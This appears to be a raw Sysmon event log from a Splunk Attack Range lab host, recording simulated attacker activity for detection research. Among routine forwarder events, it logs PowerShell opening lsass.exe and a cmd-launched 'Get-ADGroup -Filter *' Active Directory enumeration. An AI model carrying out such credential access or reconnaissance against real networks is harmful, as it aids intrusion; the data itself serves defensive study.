21:59:47.865{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77AC2CB9F4C64CA615C8E519C7F8CBBC,SHA256=5F64C306C0FB1AB556C82F169223A4C15CDB96AE8E01BBA876AC97F32A880CF9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128771Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:48.883{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84F7D29DB8E70D9D88D379902C171BD3,SHA256=6F2BB33FF48FEBBEE6B4031788B438C6BEF38520F7AB92A2AD8928C5966ACFEB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128770Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:48.850{B81B27B7-4012-611D-0B00-00000000C801}6366252C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x800000000000000035128773Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:49.890{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96DC2398C6CDFAE1DFC77D1052BF1E5E,SHA256=9A888744A8AE42E6D3CF2BDFE0BBA29527B9B408E1AA4A4AA9CEA6E7FE465D63,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128772Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:49.727{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BC74FC55FD9C289BF0C9F96C043ABFD3,SHA256=8A5D8FB8471471481BAB40B1D64A4F3C04B25437E2613F4B681251936FCBCFA5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128775Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:50.923{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A858C55244C2F43B685CEB0D07E03D1,SHA256=A1CEC508B20700C7A51E536A990ADA7309017CE3AF4013EC7A5177F97AC51D2A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128774Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:14.903{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62197-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128778Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:51.973{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=004A5D3FA67E58C33B9EDD208707BE83,SHA256=68D5A4ACADDBD2C11A79E1300A89DE369387FEF3EA8CF5E51B3F02536E78A196,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128777Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:15.201{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62199-false10.0.1.12-8000- 354300x800000000000000035128776Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:15.044{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62198-false10.0.1.14WIN-DC-1289389- 23542300x800000000000000035128780Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:52.987{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16CCF2E33C1F23682ACE2BC03E6B62A5,SHA256=0FBAEFA5C3D00081CE6934592F587684D17B150530A98495B34E039C57F495C7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128779Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:15.794{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62200-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128781Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:54.019{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F246727A07CAE1CCEC4E4638BDF27C1,SHA256=F8DDAC9D7BE45C689464F40D515B9F387FA9EB54AAC4A43BA8E712D37042FBD3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128782Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:55.069{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=370FFBDD612F9DB3EF296F9C6F18DD70,SHA256=3C5196EB0DBF09C8B71ADA45230E012732741B01446ABF6A18380D15BF94A1E9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128785Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:56.684{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=58ED139862AE52CBA1CE06383335CB91,SHA256=2E0EE29BB5AB65CD9F5430E3CD1057B7F6A192103B2F15A2AD92F4CF519D9E8F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128784Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:20.254{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62201-false10.0.1.12-8000- 23542300x800000000000000035128783Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:56.069{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BCF6A12329BF21442BEE22BDF5553EC,SHA256=8F880F657764ABA79B0E891A63ECB3C089FD8BE8AB7A386E46426FDD105D9477,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128787Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:21.822{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62202-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128786Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:57.099{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5127B072CA289AC77C371BC062D16623,SHA256=D2CC902A6D1D4480EF361EC18DFD3C4077875B65BEBB4CA802DF29B67BEC2032,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128788Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:58.117{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD134BB45F0DAC161DD6F0330A3C3B99,SHA256=F750A84838DD788B978D04425081FFCAC11EA08C63DFE05A91BFD4C516E3D698,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128789Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:59.136{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82F9A72F9D08A806230717AA6D67766D,SHA256=C214F85528F5A00DCC18C150256DE2683C1D5D7A071E31529CF336EEC98C10E6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128792Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:00.681{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D7C70AC68B21CF2F65B1C241E37AC84A,SHA256=AAFFB3D49C9441C2CD4738DBF9401CA84D864B7450B9609876C910675656EF58,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128791Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:00.166{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52DF69B3D0FADF6A052AE9CA83D2A24B,SHA256=5A3778D55866144522C51274A4F5397F1D5590E8A32826E8256C1E186B354B5A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128790Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:00.082{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128795Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:26.250{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62204-false10.0.1.12-8089- 354300x800000000000000035128794Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:25.834{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62203-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128793Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:01.197{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE73C4C93BFDCDAD0B10511AB7557A62,SHA256=ABF910CB384E0FC591D3D757C80F2900DEA50F27554891D35B023E12113D3C1A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128797Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:26.281{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62205-false10.0.1.12-8000- 23542300x800000000000000035128796Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:02.198{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AF785EFE34B42147AF159D83AE24F9F,SHA256=69D47163446183409A95D6358C71330180E1BBE071D4A5FA4A08A82BE17C6B55,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128798Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:03.199{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=864153EF6CF784927D9A2B63C1484A62,SHA256=95E747C93AA23B2498AE48FE1AB0FFE8287AD3311F012401763D41A1F090C060,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128799Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:04.216{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30C1F36FAD87C59BB506DD492F768F08,SHA256=E7DC4A80F57A68AC0D00014F7B8936AA60331D3DB17751A6E0EAB4FBFD51347A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128816Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:05.683{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-83E5-613A-E796-03000000C801}5920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128815Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:05.683{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128814Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:05.683{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128813Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:05.683{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128812Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:05.683{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128811Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:05.683{B81B27B7-4130-611D-9D00-00000000C801}31603888C:\Windows\system32\csrss.exe{B81B27B7-83E5-613A-E796-03000000C801}5920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128810Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:05.683{B81B27B7-83E5-613A-E696-03000000C801}54966428C:\Windows\system32\cmd.exe{B81B27B7-83E5-613A-E796-03000000C801}5920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128809Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:05.683{B81B27B7-83E5-613A-E796-03000000C801}5920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe Get-ADGroup -Filter *C:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{B81B27B7-83E5-613A-E696-03000000C801}5496C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell.exe Get-ADGroup -Filter * 10341000x800000000000000035128808Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:05.667{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-83E5-613A-E696-03000000C801}5496C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128807Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:05.667{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128806Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:05.667{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128805Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:00:05.667{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128804Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 